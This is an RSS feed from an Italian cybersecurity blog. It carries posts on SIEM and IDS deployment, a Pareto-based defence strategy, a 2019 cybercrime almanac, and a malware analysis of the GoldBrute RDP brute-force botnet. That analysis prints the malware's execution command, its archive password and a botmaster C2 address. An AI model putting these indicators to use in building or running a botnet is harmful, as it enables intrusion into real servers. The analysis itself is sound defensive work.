&lt;li&gt;La creazione di un profilo utente amministratore è un’operazione che viene tracciata nei &lt;em&gt;security log&lt;/em&gt;. Tale informazione è potenzialmente un indizio di attività malevola, sia che essa sia fatta da una persona, sia -  e ancor di più - che sia fatta da un &lt;em&gt;software (malware)&lt;/em&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Il valore di queste informazioni aumenta se i log vengono correlati tra di loro, prendendo fonti di tipologia differente.&lt;/p&gt;

&lt;h3 id=&#34;dotarsi-di-un-siem&#34;&gt;Dotarsi di un SIEM&lt;/h3&gt;

&lt;p&gt;Il &lt;strong&gt;SIEM (Security Information and Event Management)&lt;/strong&gt; è lo strumento che si occupa di raccogliere log prodotti da diverse fonti, interpretarli, normalizzarli e correlarli tra di loro, specificatamente in ambito security.&lt;/p&gt;

&lt;p&gt;Questo repository risolve, ad esempio, i problemi di retention, mettendo a disposizione un repository unico. Il dato salvato localmente nel singolo dispositivo ha normalmente un tempo di conservazione limitato, mentre le regole di retention all’interno del SIEM possono essere definite in modo puntuale.&lt;/p&gt;

&lt;p&gt;Dobbiamo distinguere le motivazioni per cui un’azienda decide di dotarsi di un &lt;em&gt;SIEM&lt;/em&gt;. È indispensabile chiarirle internamente, prima di far partire un progetto di implementazione, per evitare che tale strumento rimanga inutilizzato o, ancora peggio, diventi un peso per il reparto IT senza effettivo beneficio per l’azienda.&lt;/p&gt;

&lt;p&gt;Il &lt;em&gt;SIEM&lt;/em&gt; può semplificare il processo di conformità dell’azienda alle norme nazionali o internazionali, framework di sicurezza o vincoli legali. Se l’obiettivo primario è limitato a questo aspetto, l’approccio da utilizzare deve tenere conto di questa scelta ed è consigliabile:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Minimizzare il numero di sorgenti di &lt;em&gt;log&lt;/em&gt; (fonti)&lt;/li&gt;
&lt;li&gt;Evitare di generare eventi&lt;/li&gt;
&lt;li&gt;Revisionare la configurazione in modo periodico&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Se invece, l’obiettivo primario è quello di migliorare il livello di sicurezza dell’azienda, magari in un processo continuativo, l’approccio sarà totalmente differente:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Raccogliere il numero maggiore di fonti, dopo aver eseguito un’attenta analisi del formato e contenuto&lt;/li&gt;
&lt;li&gt;Definire le correlazioni che devono generare eventi e alert verso il reparto IT (magari attraverso un &lt;em&gt;SOC&lt;/em&gt;)&lt;/li&gt;
&lt;li&gt;Eseguire continuamente attività di fine-tuning della configurazione e delle correlazioni. L’obiettivo è minimizzare i falsi positivi (eventi da ignorare) e ridurre i falsi negativi (eventi che dovevano essere analizzati e sono stati ignorati o scartati)&lt;/li&gt;
&lt;li&gt;Valutare gli impatti alle fonti/sorgenti durante il processo di change management o nei progetti di rinnovamento tecnologico&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;È facile intuire che la gestione di un &lt;em&gt;SIEM&lt;/em&gt; per esigenze di security richiede tempo, risorse e figure specializzate.&lt;/p&gt;

&lt;p&gt;Dotarsi di un &lt;strong&gt;SOC (Security Operations Center)&lt;/strong&gt; è indispensabile per gestire gli eventi che vengono generati dallo strumento. È possibile dotarsi internamente di un &lt;em&gt;SOC&lt;/em&gt;, ma è preferibile (per competenze e complessità di gestione) attingere da un servizio esterno, scegliendo da aziende specializzate in ambito cybersecurity che possano erogare in 24x7.&lt;/p&gt;

&lt;h3 id=&#34;aggiungere-un-ids-come-fonte-attiva-del-siem&#34;&gt;Aggiungere un IDS come fonte attiva del SIEM&lt;/h3&gt;

&lt;p&gt;Continuando nel percorso di maturazione in ambito security, &lt;strong&gt;l’inserimento di un IDS come fonte del SIEM&lt;/strong&gt; è un passo obbligato.&lt;/p&gt;

&lt;p&gt;Un &lt;em&gt;IDS (Intrusion Detection System)&lt;/em&gt; viene inserito all’interno della rete aziendale per analizzare in modo attivo il traffico di rete. L’obiettivo è quello di &lt;strong&gt;generare allarmi&lt;/strong&gt;, a fronte del rilevamento di pacchetti di rete sospetti o comportamenti anomali, sintomi di possibili intrusioni o accessi non autorizzati.&lt;/p&gt;

&lt;p&gt;Configurando un IDS come fonte del SIEM e correlando tali informazioni con altre sorgenti, è possibile, ad esempio, &lt;strong&gt;identificare un malware prima che questo generi un incident di sicurezza&lt;/strong&gt; e nei casi peggiori possa bloccare il business dell’azienda.&lt;/p&gt;

&lt;p&gt;Anche in questo caso:
* un’attività continuativa di fine tuning può migliorare la bontà delle segnalazioni generate
* la velocità nella risposta all’allarme riduce o elimina gli impatti possibili&lt;/p&gt;

&lt;p&gt;Oltre a un &lt;em&gt;sistema IDS&lt;/em&gt;, è possibile inserire (normalmente sul limite perimetrale della rete) un &lt;strong&gt;IPS (Intrusion Prevention Systems)&lt;/strong&gt;. Il primo ha un ruolo passivo ed è usato come strumento di monitoraggio, il secondo è attivo e può bloccare le connessioni che vengono identificate come anomale.&lt;/p&gt;

&lt;p&gt;Un &lt;em&gt;IPS&lt;/em&gt; è quindi più efficace di un &lt;em&gt;IDS&lt;/em&gt;, ma ha un potenziale impatto sul traffico di rete e deve essere configurato con particolare attenzione. Una configurazione errata dell’&lt;em&gt;IPS&lt;/em&gt; può quindi generare possibili disservizi, in particolare se le applicazioni utilizzate in azienda sono state sviluppate internamente (e quindi potrebbero non aver tenuto conto dell’ambito security) o sono particolarmente datate.&lt;/p&gt;

&lt;p&gt;In conclusione, per un’organizzazione pronta a investire in un questo percorso, ci sono quattro punti fondamentali da considerare:
* L’inserimento di un &lt;em&gt;SIEM&lt;/em&gt; all’interno di un’azienda semplifica i processi di Audit e Compliance, ma gioca un ruolo fondamentale nella cybersecurity
* Non bisogna sottovalutare l’impatto che tale strumento può avere sull’operatività del reparto IT
* È necessario dimensionare correttamente gli investimenti per poter beneficiare di tale strumento per aumentare il livello di sicurezza del business
* L’attivazione di un servizio esterno potrebbe mediare tra investimento e beneficio atteso&lt;/p&gt;

&lt;hr /&gt;

&lt;p&gt;👉 &lt;a href=&#34;https://www.cybersecurity360.it/soluzioni-aziendali/log-e-siem-soluzioni-per-dotarsi-un-efficiente-sistema-di-monitoraggio-dei-sistemi-it/&#34;&gt;Il seguente articolo è stato scritto per Cybersecurity360.it&lt;/a&gt; 👈&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>The Theory of Average Security: una strategia di difesa efficace per la tua azienda</title>
         <link>https://blog.cybergon.com/posts/averagesecurity/</link>
         <pubDate>Tue, 28 Jan 2020 14:44:01 +0000</pubDate>
         <authors>
         
              
             <author>Marco Lucchina</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/averagesecurity/</guid>
         <description>

&lt;p&gt;Nel nostro &lt;a href=&#34;https://cybergon.com/blog/posts/almanacco&#34;&gt;Almanacco&lt;/a&gt; abbiamo visto come gli eventi che hanno caratterizzato il mondo della Cybersecurity nel 2019 indichino l’avvengo di  numeri e trend impressionanti per i prossimi due anni. E’ purtroppo un dato di fatto che le minacce di Cybersecurity continuino a crescere.
La difesa deve quindi obbligatoriamente essere considerata un processo continuo, che si adatti in tempo reale ai cambiamenti di scenario, siano essi interni o esterni.
Come possono le organizzazioni prepararsi con un efficace piano di difesa?&lt;/p&gt;

&lt;h2 id=&#34;il-business-model-canvas-un-modello-per-la-security&#34;&gt;Il Business Model Canvas: un modello per la security&lt;/h2&gt;

&lt;p&gt;Facciamo un passo indietro: con il &lt;a href=&#34;https://cybergon.com/blog/posts/businessmodelcanvas&#34;&gt;Business Model Canvas: dark edition&lt;/a&gt; abbiamo cercato di costruire un modello in grado di evidenziare la presenza di target specifici. Per farlo, ci serve ragionare in modo visuale e andare alla ricerca di un motivo per cui qualcuno avrebbe interesse a forzare i nostri sistemi.
Se il risultato della ricerca è negativo, allora dobbiamo considerarci un target generico. Questo significa che non siamo appetibili tanto per i nostri asset (dati, informazioni) ma per le nostre vulnerabilità stesse, a causa delle quali possiamo diventare un obiettivo utile per i cyber criminali. Non è possibile escludere che i nostri dati possano assumere col tempo importanza e quindi suscitare maggiore interesse, però è quantomeno improbabile. E’ quindi consigliabile concentrarsi sul plausibile.&lt;/p&gt;

&lt;h2 id=&#34;cybercrime-i-guadagni-di-un-mercato-in-crescita&#34;&gt;Cybercrime: i guadagni di un mercato in crescita&lt;/h2&gt;

&lt;p&gt;Non possiamo non tenere in considerazione alcuni fatti.
Il Cybercrime è costantemente un passo avanti all’industria della Cybersecurity, dal momento che quest&amp;rsquo;ultima lavora sempre rincorrendo la ‘falla’ da chiudere. Chi opera in questo contesto deve superare il paradigma dell’identificazione e della successiva risoluzione della problematica, che risulta troppo lento e macchinoso di fronte a degli opponenti che sono sia innovatori che early-adopters; persone competenti, curiose, affamate e non soggette alle stesse regole delle aziende delle economie occidentali.
I dati che le aziende custodiscono sono preziosi e hanno valore, un valore non potenziale ma reale: esiste un borsino con delle quotazioni e dei siti dove comprarli. Inoltre i &lt;em&gt;tool&lt;/em&gt; di attacco o gli attacchi stessi sono disponibili a chiunque: un malintenzionato non deve essere un tecnico competente: può acquistare il codice o assoldare persone che lo sviluppino per lui.&lt;/p&gt;

&lt;p&gt;A supporto ci sono diversi studi molto interessanti - ad esempio “Hypercrime: The New Geometry of Harm” di Michael McGuire -  dai quali sappiamo che il mercato del Cybercrime si attesta sui 5 mila miliardi di euro: una cifra che, per quanto approssimativa, fa impressione ed è naturale chiedersi come possa essere composta. Ad esempio, i riscatti per avere le chiavi di decrittazione di un &lt;em&gt;ransomware&lt;/em&gt; ammontano a circa 1 miliardo di dollari. Una cifra che si riferisce ad un anno di attività e che ha ritmi importanti di crescita. Ma lo stesso &lt;em&gt;ransomware&lt;/em&gt; è, spesso, solo una copertura: dopo aver forzato un sistema e avuto accesso alle informazioni, gli attaccanti decidono di coprire le proprie tracce con un &lt;em&gt;ransomware&lt;/em&gt;. Forse non tutti pagheranno il riscatto, di certo, però, dovranno ripartire da un backup; azione che inesorabilmente cancella tutte le tracce che un intruso lascia mentre le informazioni sottratte sono già in vendita da qualche parte.&lt;/p&gt;

&lt;p&gt;Un buon quadro informativo lo fornisce &lt;a href=&#34;https://www.bromium.com/wp-content/uploads/2018/05/Into-the-Web-of-Profit_Bromium.pdf&#34;&gt;Bromium, di cui ti consigliamo di leggere il report&lt;/a&gt;: è molto interessante e permette di capire perché la comprensione del fenomeno passa necessariamente dai modelli di business.&lt;/p&gt;

&lt;h2 id=&#34;come-difendersi-dagli-attacchi-una-buona-indicazione-viene-da-una-delle-tante-applicazioni-della-legge-di-pareto&#34;&gt;Come difendersi dagli attacchi? Una buona indicazione viene da una delle tante applicazioni della Legge di Pareto.&lt;/h2&gt;

&lt;p&gt;Essere sicuri non è possibile: prendiamone atto e lavoriamo invece sul rischio, cercando un buon compromesso tra quanto possiamo investire e i risultati che ci aspettiamo da questo investimento. Lavoriamo per prima cosa sui processi interni, ossia sul modo in cui i sistemi vengono utilizzati, prima ancora che sulla tecnologia stessa. Ci sono tante cose da fare che non hanno un costo eccessivo o proibitivo.
Poniamoci come obiettivo il fatto che il successo di attacco sia antieconomico per chi lo lancia. In questo modo si presume che l’attaccante rivolga le sue attenzioni ad altri perché più facili da colpire.
Un approccio pratico, consapevole, necessario. Per farlo lavoriamo sulla sua vista prospettica.&lt;/p&gt;

&lt;p&gt;Cosa vede un attaccante di una organizzazione? Semplice: le vulnerabilità che espone.
Se anche solo una di queste può essere sfruttata con un exploit già in suo possesso ecco che l’attacco avrà costi bassi e alte possibilità di successo.
Il numero di vulnerabilità di un’organizzazione si riduce proporzionalmente con l’aumentare degli investimenti, senza però chiudersi mai. In sostanza ci saranno sempre delle vulnerabilità: ad esempio le “zero-day” o più semplicemente quelle relative a sistemi non aggiornabili per vincoli applicativi.
È ipotizzabile, quindi, che lo schema sia ancora una volta regolato della Legge di Pareto, in particolare il corollario che enuncia l’impossibilità o l’anti-economicità di raggiungere il 100% di qualunque insieme, e pone il livello ottimale all’80%.&lt;/p&gt;

&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th align=&#34;center&#34;&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/averagesecurity/Average-security-pareto-difesa.jpg&#34; alt=&#34;Average-security-pareto-difesa&#34; /&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;

&lt;tbody&gt;
&lt;tr&gt;
&lt;td align=&#34;center&#34;&gt;&lt;em&gt;Legge di Pareto applicata alla difesa&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;

&lt;p&gt;Si ottiene l’accesso nell’area di attacco anti-economica con gli investimenti giusti, siano essi processi, best practice, cultura o tecnologia, traducibili in un constante monitoraggio dei sistemi e in un processo di &lt;em&gt;incident management&lt;/em&gt;.
La componente tecnologica, complementare a quella culturale e che deve sempre essere proporzionale alle capacità dell’organizzazione, l’abbiamo schematizzata sulla base di una crescente adozione di funzionalità atte ad aumentare la capacità di difesa.&lt;/p&gt;

&lt;h2 id=&#34;la-mappa-delle-difese&#34;&gt;La mappa delle difese&lt;/h2&gt;

&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th align=&#34;center&#34;&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/averagesecurity/Average-security-mappa-difese.jpg&#34; alt=&#34;Average-security-mappa-difese&#34; /&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;

&lt;tbody&gt;
&lt;tr&gt;
&lt;td align=&#34;center&#34;&gt;&lt;em&gt;Mappa delle difese&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;

&lt;p&gt;Il grafico che abbiamo prodotto rappresenta gran parte delle funzionalità che compongono un’efficace strategia di difesa, tali funzionalità sono state pensate e proposte in ottica di complessità crescente, partendo da destra e propagandosi verso sinistra. La linea rossa demarca le componenti che fino a qualche anno fa erano sufficienti. Purtroppo la crescente complessità degli attacchi di oggi li ha resi necessari ma non più sufficienti.&lt;/p&gt;

&lt;p&gt;Man mano che si va verso l’esterno del grafico la specializzazione in Cybersecurity aumenta. Partendo infatti dal classico antivirus, si passa attraverso i cosiddetti “next-generation” firewall e si arriva alle attività ben più complesse di Cybersecurity e Cyber Intelligence: ne è un esempio il SIEM (Security Information and Event Management), la combinazione di servizi e tecnologie utili alla raccolta di dati e alla normalizzazione degli stessi per fare analisi e correlazione di eventi.&lt;/p&gt;

&lt;p&gt;Il governo di tutte le difese passa attraverso un Security Operation Center, la cui efficacia poggia su quattro pilastri:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;La Cyber Intelligence per comprendere e ove possibile prevenire le minacce;&lt;/li&gt;
&lt;li&gt;Il costante monitoraggio delle vulnerabilità;&lt;/li&gt;
&lt;li&gt;La raccolta e la correlazione di tutte le informazioni sensibili per la sicurezza e la loro analisi al fine di identificare anomalie e incidenti;&lt;/li&gt;
&lt;li&gt;La gestione dell’incidente e i piani di emergenza in caso di attacchi gravi;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Il tutto inserito in un contesto dove i &lt;em&gt;Remediation Plan&lt;/em&gt; e i &lt;em&gt;Mitigation Plan&lt;/em&gt; si susseguano incessantemente. I primi risolvono un rischio concreto e imminente, i secondi elevano costantemente il livello di sicurezza dell’infrastruttura.
Ecco che, come abbiamo detto all’inizio, la difesa deve essere un processo continuo e deve adattarsi ai cambiamenti di scenario, interni o esterni.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Almanacco 2019</title>
         <link>https://blog.cybergon.com/posts/almanacco/</link>
         <pubDate>Mon, 30 Dec 2019 14:46:01 +0000</pubDate>
         <authors>
         
              
             <author>Marco Lucchina</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/almanacco/</guid>
         <description>

&lt;p&gt;La Cybersecurity è, di fatto, il principale “effetto collaterale” dell’avvento dell’industria 4.0.
Cresce il digitale, cresce il Cybercrime,  con un effetto che potremmo definire esponenziale.
Lo scenario della Cybersecurity è cambiato in modo spaventoso dal 2015 ad oggi - con un nesso di causa effetto di cui racconteremo in un articolo dedicato - e la traiettoria lo pone sempre più in rotta di collisione con la vita reale e soprattutto il portafoglio delle aziende.&lt;/p&gt;

&lt;p&gt;Il 2019 è stato ricco di avvenimenti e con l&amp;rsquo;avvicinarsi dell&amp;rsquo;anno nuovo abbiamo deciso di selezionare quelli più rilevanti e identificare alcuni possibili trend significativi per il 2020.&lt;/p&gt;

&lt;h2 id=&#34;cybersecurity-nel-2019&#34;&gt;Cybersecurity nel 2019&lt;/h2&gt;

&lt;p&gt;Prima di conoscere i fatti più importanti e interessanti, vediamo tre curiosità che forse non conoscevi:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Anche i ricchi piangono&lt;/strong&gt; - i dieci più importanti data breach conosciuti fino ad oggi sono: Yahoo (2013); Marriott, (2014-2018); Adult FriendFinder, (2016); MySpace, (2016); Under Armour, (2018); Equifax, (2017); eBay, (2014); Target, (2013); Heartland Payment Systems, (2018); LinkedIn, (2012).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Una nuova Las Vegas&lt;/strong&gt; - il &lt;em&gt;jackpotting&lt;/em&gt; è un attacco contro gli ATM, tipicamente quelli americani che vengono posizionati negli esercizi privati, che consiste nel prendere il controllo del dispositivo e fargli svuotare la riserva di contanti. Non si sa quanto sia stato sottratto perché l’informazione non viene volontariamente diffusa. Sappiamo però che nel 2019 sono state sostituite, solo negli Stati Uniti, 400.000 unità.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Altro che vecchie reti GSM&lt;/strong&gt; - &lt;em&gt;SIM swapping attack&lt;/em&gt; permette di reindirizzare tutti i messaggi verso una terza SIM, intercettando chiavi di doppia autenticazione e tanto altro.&lt;/p&gt;

&lt;h3 id=&#34;cos-è-successo-in-questi-mesi&#34;&gt;Cos’è successo in questi mesi?&lt;/h3&gt;

&lt;p&gt;Ecco alcuni eventi e dati degni di nota:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Il World Wide Web compie 30 anni. E’ stato inventato nel 1989, oggi ci sono circa 2 miliardi di siti;&lt;/li&gt;
&lt;li&gt;I contenuti digitali occupano quasi 100 zettabytes;&lt;/li&gt;
&lt;li&gt;Più di metà della popolazione mondiale ha accesso ad internet (4 miliardi di persone su 7,7);&lt;/li&gt;
&lt;li&gt;Facebook è la più grande nazione della terra (…e questo si sapeva), ma Fortnite è la settima;&lt;/li&gt;
&lt;li&gt;Sono state rubati i documenti (ID) di 60 milioni di americani;&lt;/li&gt;
&lt;li&gt;Le persone sopra i 60 anni sono tra le più colpite;&lt;/li&gt;
&lt;li&gt;Il 90% delle frodi avviene via mail o social network;&lt;/li&gt;
&lt;li&gt;Viene pagato un riscatto da ransomware ogni 14 secondi;&lt;/li&gt;
&lt;li&gt;Esiste una &lt;a href=&#34;https://www.fbi.gov/wanted/cyber&#34;&gt;lista di Cyber-ricercati dall&amp;rsquo;FBI&lt;/a&gt;;&lt;/li&gt;
&lt;li&gt;Si stima che il 70% delle cripto-valute venga utilizzato per attività illecite;&lt;/li&gt;
&lt;li&gt;Il market cap delle principali è: Bitcoin €116.475.613.895; Ethereum €12.523.597.149;&lt;/li&gt;
&lt;li&gt;Al mondo esistono più di cento cripto-valute;&lt;/li&gt;
&lt;li&gt;Il market cap delle prime 100 è: € 167.324.922.214;&lt;/li&gt;
&lt;li&gt;Il Deep web (quello non indicizzato dai motori di ricerca) è 7000 volte più esteso di quello che conosciamo e utilizziamo ogni giorno;&lt;/li&gt;
&lt;li&gt;Il valore dei dati sanitari, sul mercato nero, ha superato quello delle credenziali di una carta di credito o di conto bancario;&lt;/li&gt;
&lt;li&gt;I malware hanno iniziato a colpire apparati medicali quali defibrillatori, pace makers e neuro stimolatori;&lt;/li&gt;
&lt;li&gt;Comprare un “hacking kit” parte dalla stratosferica cifra di… 1€;&lt;/li&gt;
&lt;li&gt;Esiste una blacklist di 2 miliardi di password da non usare. Purtroppo, rappresentano ancora una percentuale importante delle password utilizzate;&lt;/li&gt;
&lt;li&gt;Michael Page stima che siano stati richiesti 1 milione di specialisti di Cybersecurity e che ci sia lo 0% di non impiegati tra le persone che hanno questa specializzazione. Le donne rappresentano il 20% di questa forza lavoro;&lt;/li&gt;
&lt;li&gt;In Italia è stato attivato il primo corso di laurea magistrale in Cybersecurity;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Questi eventi ci spingono a chiederci: cosa aspettarsi dal futuro?&lt;/p&gt;

&lt;h3 id=&#34;alcune-previsioni-per-il-2020&#34;&gt;Alcune previsioni per il 2020:&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;La superficie di attacco aumenterà di 100 volte nei prossimi due anni in virtù dell’aumentare degli oggetti connessi e dei dati disponibili;&lt;/li&gt;
&lt;li&gt;Assisteremo ad un aumento esponenziale dei data breach nelle strutture sanitarie;&lt;/li&gt;
&lt;li&gt;Gli attacchi di ransomware verso strutture sanitarie quadruplicheranno;&lt;/li&gt;
&lt;li&gt;Il valore dei dati sanitari aumenterà di 50 volte nel corso del biennio, si stima che una cartella clinica verrà venduta a 60€;&lt;/li&gt;
&lt;li&gt;Il 95% del traffico internet è indirizzato verso i grandi Cloud Service Providers (Hyperscalers) e l’esfiltrazione di dati da queste piattaforme crescerà di 100 volte in 2 anni;&lt;/li&gt;
&lt;li&gt;Si raggiungeranno i 6 miliardi di smartphone connessi alla rete che, in due anni, diventeranno il maggior veicolo di infezione;&lt;/li&gt;
&lt;li&gt;Vedremo il primo incidente d’auto mortale dovuto ad un malware che ha infettato un sistema di guida autonomo;&lt;/li&gt;
&lt;li&gt;I quattro paesi che investiranno di più in Cybersecurity saranno Stati Uniti, Israele, Regno Unito e Canada. Unione Europea, purtroppo, non pervenuta;&lt;/li&gt;
&lt;li&gt;Gli Stati Uniti approveranno una legge sulla Data Protection (progetto California);&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Non è finita qui: entro il 2021 i danni del Cybercrime supereranno quelli di tutti i disastri naturali combinati insieme e i profitti supereranno niente meno che quelli del traffico di droga.&lt;/p&gt;

&lt;p&gt;E tu, come puoi prepararti?
Il primo “buon proposito” per l’anno nuovo può essere questo: comportati bene, internet non dimentica.&lt;/p&gt;

&lt;hr /&gt;

&lt;p&gt;&lt;strong&gt;Crediti&lt;/strong&gt;: le fonti sono i report di University of Surrey, University of Sidney, Cisco Systems, Checkpoint Software ltd, Fortinet, FireEye (Madiant) e Cybersecurity Ventures.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>GoldBrute: analisi dell&#39;aggiornamento del malware rilasciato a Giugno</title>
         <link>https://blog.cybergon.com/posts/goldbrute/</link>
         <pubDate>Fri, 13 Dec 2019 09:46:01 +0000</pubDate>
         <authors>
         
              
             <author>Marco Nilo</author>
         
               
             <author>Ivan Paterno</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/goldbrute/</guid>
         <description>

&lt;p&gt;In questo articolo analizziamo una nuova versione del malware “GoldBrute”, apparso in rete per la prima volta a Giugno 2019.&lt;/p&gt;

&lt;h2 id=&#34;come-funziona&#34;&gt;Come funziona:&lt;/h2&gt;

&lt;p&gt;Il malware scansiona e sfrutta server che espongono il servizio RDP (Remote Desktop Protocol) e che utilizzano credenziali deboli o rubate.
La lista di macchine censite e potenzialmente controllate dalla botnet era di circa 1.5 milioni a Giugno 2019 (&lt;a href=&#34;https://isc.sans.edu/forums/diary/GoldBrute+Botnet+Brute+Forcing+15+Million+RDP+Servers/25002/&#34; title=&#34;Sans GoldBrute&#34;&gt;Fonte&lt;/a&gt;) ma, pensate, in questo momento, il numero delle “vittime” ha superato i 4 milioni.&lt;/p&gt;

&lt;p&gt;GoldBrute sfrutta la vulnerabilità BlueKeep (&lt;a href=&#34;https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708&#34;&gt;CVE-2019-0708&lt;/a&gt;) che può affliggere un sistema operativo Windows con l’RDP abilitato e non aggiornato.&lt;/p&gt;

&lt;p&gt;GoldBrute si nasconde dietro un processo apparentemente lecito - javaw.exe - che viene scaricato sulla macchina compromessa insieme al Java Runtime, varie dll e anche un archivio zip che risulta essere protetto da password (XHr4jBYf5BV2Cd7zpzR9pEGn).&lt;/p&gt;

&lt;p&gt;L’archivio – hash.zip - contiene due file di testo:
1. Il primo file contiene circa 4 milioni di coppie &amp;lt;indirizzo IP&amp;gt;:&amp;lt;porta&amp;gt;;
2. Il secondo contiene circa 14 mila coppie &amp;lt;username&amp;gt;:&amp;lt;password&amp;gt; che vengono utilizzate per l’attività di brute force.&lt;/p&gt;

&lt;p&gt;A questo punto, viene lanciato il comando per l’esecuzione del malware:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;C:\Users\\\&amp;lt;username&amp;gt;\AppData\Local\bitcoins\bin\javaw.exe -server -d64 -Xms64m -jar C:\Users\\\&amp;lt;username&amp;gt;\AppData\Local\bitcoins\bin\btclibrary.dll&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Il file btclibrary.dll è, in realtà, un file Java Archive Data (JAR) che abbiamo decompilato e analizzato.
Il JAR si presenta con circa 12000 classi: solo 84 sono quelle create ex novo e appartenenti al malware, le restanti sono classi di libreria.&lt;br /&gt;
L’entry point principale è situato all’interno della classe SocketMain.
Dal codice si nota come  all’interno della classe venga istanziato un oggetto di tipo Console su cui viene inizializzato l’intero flusso tramite il metodo run.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/goldbrute/GOLDBRUTE_IMG1.png&#34; alt=&#34;IMG1&#34; /&gt;&lt;/p&gt;

&lt;p&gt;All’interno del metodo run vengono assegnati alcuni parametri iniziali di configurazione (definiti all’interno della classe Config) e, nella parte finale, viene istanziato un oggetto di tipo GoldBrute, che fa partire l’esecuzione malevola.
Le configurazioni standard inizializzate dal malware definiscono l’indirizzo IP e la porta del botmaster - 172.94.15.22:8333 - con sede in Germania.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/goldbrute/GOLDBRUTE_IMG2.png&#34; alt=&#34;IMG2&#34; /&gt;&lt;/p&gt;

&lt;p&gt;La classe GoldBrute può essere definita come la classe core in cui vengono effettuate e controllate, nell’ordine:
- le attività di scansione tramite l’utilizzo della classe ScanThread
- le attività di brute force servendosi della classe BruteThread.&lt;/p&gt;

&lt;p&gt;Per gestire queste due attività vengono creati ed eseguiti due tipologie di Thread:
&lt;img src=&#34;https://blog.cybergon.com/imgs/goldbrute/GOLDBRUTE_IMG3.png&#34; alt=&#34;IMG3&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;scanthread&#34;&gt;ScanThread&lt;/h2&gt;

&lt;p&gt;Il Thread avvia una scansione di indirizzi IP per cercare eventuali host con RDP esposto e vulnerabile.
Solo quando il numero di risultati prodotti supera la soglia definita nella variabile CHECKER_EXPECT_IP_FOR_ENABLE_BRUTE (di default impostata a 80) viene eseguita l’attività di brute force.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/goldbrute/GOLDBRUTE_IMG4.png&#34; alt=&#34;IMG4&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Questa scansione viene delegata alla classe ScanThread che, a differenza della versione distribuita a giugno, è stata aggiornata con la possibilità di supportare altri due protocolli SSH e Telnet.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/goldbrute/GOLDBRUTE_IMG5.png&#34; alt=&#34;IMG5&#34; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/goldbrute/GOLDBRUTE_IMG6.png&#34; alt=&#34;IMG5&#34; /&gt;&lt;/p&gt;

&lt;p&gt;A questo punto, ogni volta che viene trovato un nuovo host vulnerabile, questo viene aggiunto ad una coda di tipo ConcurrenteLinkedQueue che, successivamente, viene restituita al botmaster.&lt;br /&gt;
Per effettuare le scansioni e per individuare host con RDP esposto e vulnerabile viene generato un pacchetto ad hoc il cui formato è descritto all’interno del metodo processPacket.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/goldbrute/GOLDBRUTE_IMG7.png&#34; alt=&#34;IMG6&#34; /&gt;&lt;/p&gt;

&lt;p&gt;La conversione dal formato byte a UTF-8 è la seguente:&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/goldbrute/GOLDBRUTE_IMG8.png&#34; alt=&#34;IMG7&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;brutethread&#34;&gt;BruteThread&lt;/h2&gt;

&lt;p&gt;BruteThread è la classe designata all’attività di brute force che sfrutta le credenziali statiche caricate precedentemente.&lt;br /&gt;
In particolare, la classe BruteThread riutilizza per i propri pacchetti un formato simile a quello utilizzato per la fase di scansione.
Tutta la comunicazione tra i bot e il botmaster avviene attraverso connessioni di tipo WebSocket e utilizza una cifratura AES/CBC/PKCS5Padding.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/goldbrute/GOLDBRUTE_IMG9.png&#34; alt=&#34;IMG8&#34; /&gt;&lt;/p&gt;

&lt;p&gt;La cifratura/decifratura viene effettuata sfruttando chiavi inserite staticamente all’interno del file di configurazione (classe Config).&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/goldbrute/GOLDBRUTE_IMG10.png&#34; alt=&#34;IMG9&#34; /&gt;&lt;/p&gt;

